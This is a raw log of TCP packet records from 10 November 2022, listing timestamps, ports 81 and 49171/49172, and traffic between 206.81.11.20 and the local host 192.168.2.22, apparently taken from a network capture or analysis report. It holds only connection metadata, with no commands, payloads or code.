Nov 10, 2022 11:43:11.716247082 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716288090 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716325998 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716327906 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716358900 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716370106 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716408968 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716411114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716450930 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716487885 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716490030 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716531038 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716567039 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716576099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716600895 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716618061 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716655970 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716658115 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716701031 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716739893 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716742992 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716785908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716824055 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716825008 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716840029 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716866970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716902971 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716907024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716948032 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716989040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716985941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717034101 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717072010 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717073917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717084885 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717114925 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717153072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717155933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717195988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717231989 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717236042 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717276096 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717312098 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717318058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717329025 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717360020 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717396975 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717400074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717458010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717498064 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717508078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717538118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717577934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717614889 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717618942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717658997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717662096 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717700005 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717732906 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717739105 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717780113 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717782021 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717822075 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717861891 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.717864037 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.717966080 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.753983021 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754064083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754106998 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754148006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754188061 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754187107 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754188061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754188061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754231930 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754257917 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754273891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754287004 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754311085 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754317045 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754359007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754398108 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754439116 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754476070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754479885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754476070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754476070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754476070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754525900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754566908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754578114 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754597902 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754630089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754661083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754708052 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754740000 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754791021 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754802942 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754844904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754872084 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754910946 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754952908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.754982948 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.754993916 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755038977 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755059004 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755098104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755162001 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755182981 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755203962 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755244017 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755271912 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755285025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755325079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755348921 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755367041 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755407095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755446911 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755451918 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755486965 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755520105 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755528927 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755568981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755592108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755609035 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755650043 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755670071 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755692005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755729914 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755750895 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755769968 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.755829096 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.755942106 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.757792950 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.757837057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.757878065 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.757914066 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.757916927 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.757957935 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.757982969 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.757999897 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758040905 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758119106 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758160114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758207083 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758248091 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758269072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758299112 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758308887 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758351088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758389950 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758414030 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758430004 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758471966 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758493900 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758512020 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758552074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758590937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758611917 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758631945 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758671999 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758693933 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758712053 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758760929 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758774042 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758800983 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758841991 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758861065 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.758920908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758963108 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.758996010 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759001970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759043932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759068966 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759083033 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759124994 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759147882 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759165049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759206057 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759227991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759247065 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759287119 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759309053 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759327888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759367943 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759390116 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759409904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759449959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759471893 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759490013 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759531975 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759562016 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759572029 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759613991 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759635925 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759654999 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759695053 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759733915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759773970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759793997 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759814024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759824991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759856939 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759879112 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759896994 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759936094 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.759958982 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.759977102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760015965 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760035992 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760059118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760098934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760124922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760138988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760180950 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760201931 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760220051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760258913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760268927 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760298967 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760327101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760337114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760377884 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760400057 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760417938 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760461092 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760479927 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760503054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760543108 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760566950 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760581970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760622025 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760651112 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760662079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760703087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760731936 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760742903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760783911 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760824919 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760828972 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760864019 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760886908 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760902882 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760942936 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.760967016 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.760982037 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761020899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761042118 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761064053 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761102915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761125088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761143923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761183023 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761209011 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761233091 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761261940 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761298895 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761301041 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761328936 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761357069 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761359930 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761387110 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761415958 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761420965 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761445045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761473894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761481047 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761503935 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761533022 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761534929 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761563063 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761590958 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761598110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761621952 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761651993 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761652946 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761682034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761710882 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761713982 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761740923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761770010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761775017 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761799097 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761826038 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761827946 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761857033 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761882067 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.761888027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761917114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761948109 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761970997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.761992931 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762016058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762017965 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762038946 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762068987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762087107 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762098074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762129068 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762129068 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762159109 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762187004 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762188911 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762218952 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762248039 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762264013 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762278080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762307882 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762309074 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762336016 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762362003 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762365103 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762403965 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762430906 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762432098 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762465000 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762495041 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762496948 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762526035 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762542009 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762550116 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762578964 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762581110 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762578964 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762608051 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762613058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762639046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762639046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762643099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762666941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762672901 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.762705088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.762727976 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.764218092 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.797846079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.797919989 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.797960997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798001051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798053980 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798053980 CET	49171	81	192.168.2.22	206.81.11.20
